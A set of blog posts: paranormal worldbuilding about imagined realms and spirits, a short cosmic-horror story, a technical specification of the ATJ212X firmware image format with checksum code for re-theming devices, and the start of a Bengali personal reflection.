Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.

There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.

There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.

The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.

Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.

The Dreaming

The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It's the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It's exercise for your subconscious. It's healthy and natural to be here and everybody does it.

The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.

The Dreamlands

The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you've ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.

But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.

If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.

The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don't be flashy; don't draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There's a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.

When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.
It's like Plato's Cave. You've been Dreaming at the shadows on the wall. Now you get to turn around.

Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where's the fun in that?
The Dreamlands is populated by creatures of fantasy and horror, with cities ancient and futuristic, all borne of the Dreaming minds of humanity over the centuries. The Dreamlands are an everchanging place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you've heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.

The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.

It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.

The Fugue

The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It's often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It's such a narrow band that it's easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.

In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.

I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.

For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it's just how they eat and they have to eat.

Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.

Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.

The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.

Effervescence

Between us and The Gleam.

Realm of meaningless delight.

Insight and questing to the right.

Resignation and acceptance to the left.

Perhaps this is the home of the Fae. The Seelie.

Effluvia

Between us and The Gloam.

Realm of decay.

The Unseelie.

The Gloam

Umbra

The Void

The Gutter

The Gloaming

To reach the Gloam without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man's land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn't matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.

They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.

They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you'd rather not know. Things you can never forget once told.
You don't have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else's is the easiest way. They love it when we spill blood. They love it when we are afraid.

And, remember, they are always listening.

Always.

The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.

I know a great deal more about this entity, but to write it down is to further imperil myself.

The Gleam

The Blazing World

Hyperspace

The Gleaming

If you have heard of the “machine elves” then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would “up” mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.

From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.

The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That's what the machine elves want. They want us to be the best versions of ourselves.

A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.

A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It's also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.

They line the “shore” of the “ocean” we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.

To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.

The Gloam is about inevitably.

The Gleam is about possibility.

Ur

When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.

It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.

It is chance.

It is random.

But it is also eternal.

Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.

The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.

Under no circumstances should any living thing deign to enter Ur itself. It's driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.

It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.

Why would anyone seek out such a place?

Change is seductive, to be someone else, to be better.

Perhaps you are terminally ill.

Perhaps you are hopeless.

Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.

Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?

Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?

Or perhaps.

Perhaps.

You prefer to be undone.

There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.

But instead of seeking strength or fellowship, they choose to forget and to be forgotten.

What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.

True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.

Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.

Elysium / Nirvana

Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.

Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.

Epicurea

Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.

Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.

Hell

Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.

Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.

Nuntius

Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.

One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.

Vitrium

Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.

To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.

For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.

Acceptance / Obsequium

Obedience, Submission, Compliance, Resignation

Concerned with how

Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.

Passive while appearing Active.

Insight / Consilium

Insight, Discernment, Understanding

Concerned with why

Introspection, Mindfulness, experience over explanation, seeing and being over knowing.

Active while appearing Passive.

Addendum 1: Oblivion

The Blight

Singularity

Nowhere

Nowhen

Absolute Zero

Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.

Naralmtu serve The Blight.

Absolute Zero

https://en.wikipedia.org/wiki/Absolute_zero Absolute zero is the lowest possible temperature, a state at which a system's internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale,[1][2] and −459.67 °F on the Fahrenheit scale.[3] The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.

At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.

Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system's temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.

Addendum 2: Rapture

The Bloom

The Song

Ecstasy

Exultation

Ubiquity

Omnilarity

Everywhere

Everywhen

Quantum Foam

Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.

This is the first moment, before any rules have been established, before up is up and down is down.

Ohmadrundi (a subset of machine elves) serve The Bloom.

IMAGE MISSING

Absolute Hot (Planck Temperature)

[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]] https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 1032 degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 106); silicon can be created by fusion at 1 billion K (109). In short, the Planck temperature is very toasty indeed.

Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 -43 of a second after the Big Bang, the great cataclysm in which the universe was born. (10 -43 of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)

Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.

There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 1010 K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 1032 K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.

Addendum 3: The Mirror Realm

Also called “Ouroboros”

Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.

To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.

This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.

This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.

There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.

And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.

Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?

Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?

I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to not reflect ourselves multiple time a day.

To scry is to peer sideways into the mirror realm and find insight. It is too look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.

If such power can be had by simply looking how much greater would it be to walk within?

As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.

However, if someone were step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.

And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.

How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?

Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.

It is up to you whether or not you wish to believe them.

Addendum 4: The In Between

The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.

In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.

At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.

Why would this place be considered a sibling to The Mirror Realm?

The most common way to enter The In Between is to step inside a wall.

Addendum 5: The Fae

They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?

I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.

Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.


#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

 
Read more...

from Psychomancer

The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.

But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.

We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.

And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet'hotep and its lesser-known siblings NAM, NUM, and IM.

But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can't even truly look at them because, to us, those angles, do not exist.

We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.

Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.

So who did I meet that unusually warm Saturday night?

I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.

Not my front door, nor my back door.

It came from my basement door.

If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.

I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.

I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.

I can't recall seeing his eyes.

“Excellent!” he said in a thick British accent stolen from Austin Powers.

“This is one where you listen.”

“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.

“A bit?” He rubbed his chin with his right hand. “I don't think so.”

He offered his left hand.

“Archibald Horatio Pierse, IV,” he said, overly emphasizing The Fourth as if it was of great importance. “Pierse with an 's',” concluded his introduction.

He was still shaking my hand, which I didn't remember offering in return.

“Sometimes,” he said. “I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.”

'bloke or bird,' I thought. This has to be a bit.

“Right,” he said, no longer shaking my left hand, but still holding it.

The world fractured, splintered. Every cell pulled in a different direction.

Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.

We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.

We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.

There is no pattern, no spider's web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.

When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.

Gender, race, nationality, species, moral character, upbringing: I am every possibility.

I am every drop in the ocean and the ocean itself.

I am the sky, the moon, the stars, a worm, a bacteria, a lichen.

The one who showed me—I had forgotten he existed—he bade me, “turn around.”

What a strange request! I am all that is and was. Do I not already “see” in every direction?

“Turn around.”

A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.

Syzygy.

I am All, yet All That is Not Me is also All.

I see the tapestry, the enmeshed pattern.

The beauty.

The belonging.

The Love.

Every part of me weeps.

An infinity of infinities.

Each unique.

Together, whole.

Like curtains dancing in the breeze.

Like a rainstorm.

Like staring at the sun.

Like the song of cicadas.

Unity.

From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…

All is One and One is All.

Then I'm lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.

And I can't stop crying.


I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don't I show you what sideways looks like?
How about sideways?
What about sideways"?
I'd like to show your sideways.

I thinkdon't I willshall I showstretchsideways youwhatsideways looks like.

#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal

 
Read more...

from Tom Tildavaan

Regardless of what's your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.

Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.

Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.

Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.

In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.

And to the vendors who ship these devices — you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.

And to start us up, here's the format of FWIMAGE.FW for ATJ212X devices.

Actions Semiconductor FWIMAGE.FW Specification

1. File Structure

The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).

Section Size Description
Global Header 512 bytes Basic metadata (Magic, VID/PID, Ver)
LDIR Table 240 * 32 bytes Fixed-size Logical Directory entries for all files
Component Data Variable Raw binary data for drivers, APs, and STY files

2. Global Header (Sector 0)

The first 512 bytes contain the system metadata.

Offset Size Description
0x00 4 Magic: 0x0FF0AA55
0x04 4 SDK Version (ASCII)
0x08 4 Firmware Version (ASCII)
0x0C 2 Vendor ID (VID)
0x0E 2 Product ID (PID)
0x10 4 LDIR Checksum (Stride 4)
0x50 48 USB Setup Info (ASCII)
0x80 336 SDK Description (ASCII)
0x1FA 4 R3 Config Sector Offset (Pointer to DEVINFO.BIN)
0x1FE 2 Global Header Checksum (Sum of first 510 bytes)

3. Logical Directory (LDIR) Table

Starting at offset 0x200 (Sector 1) and ending at 0x2000 (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.

Offset Size Description
0x00 8 Filename (8.3 format, space padded)
0x08 3 Extension (ASCII)
0x0B 5 Padding
0x10 4 Sector Offset: Start position in sectors (absolute position = offset * 512)
0x14 4 File Size: Size in bytes
0x18 4 Reserved
0x1C 4 File Checksum (Stride 4 sums)

4. Checksums

Global Header Checksum

The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.

uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i < len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] << 8);
        sum += val;
    }
    return sum;
}

LDIR & File Checksum Algorithm (Stride 4)

Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.

#include <stdint.h>
#include <stddef.h>

/**
 * Calculates the Actions Stride-4 checksum.
 * @param data Pointer to the buffer (must be 4-byte aligned for some platforms)
 * @param len  Length of data in bytes (should be multiple of 4)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] << 8) |
                       ((uint32_t)data[i+2] << 16) |
                       ((uint32_t)data[i+3] << 24);
        sum += val;
    }
    return sum;
}

Sector Alignment

Every file within the image must start on a 512-byte boundary. When packing, files must be padded with null bytes to reach the next sector.

Boot Sequence

The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.


Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered — see rockbox sources for atjboottool.

 
Read more...

from লোকমানুষ এর ব্লগ

the-moon-and-blue-red-cloud-fusion

মৌসুমী ভৌমিকের গানটা আজ হঠাৎ মনে পড়ে গেল- “কেন শুধু শুধু ছুটে চলা, একে একে কথা বলা, নিজের জন্য বাঁচা নিজেকে নিয়ে..”। গানটা কেমন যেন আজকের দিনগুলোর মুখপাত্র হয়ে উঠেছে। শব্দগুলো শুধু সুর নয়, এখন আমার নিঃশ্বাসের অনুষঙ্গ।

দিনগুলি এখন হিসাবের বাইরে, বিচ্ছিন্ন পাথরের মতো যার যার মত ছড়িয়ে পড়ে আছে। গতকালের সকাল আর আজকের বিকালের মধ্যে কোনো সীমানা খুঁজে পাই না। দুই দিনকে আলাদা করার জন্য নতুন কোনো শব্দ নেই অভিধানে। প্রতিদিন একই জানালা, একই আলোছায়া, একই ঘড়ির কাঁটার দৌড়। বিরক্তির ভাঁজ কপালে জমে, কিন্তু পরক্ষণেই মনে হয়- এইটুকুই বা কম কী? সময় তো আরো ভাঙচুর করতে পারত, তবু কিছুটা শৃঙ্খলা এখনো টিকে আছে।

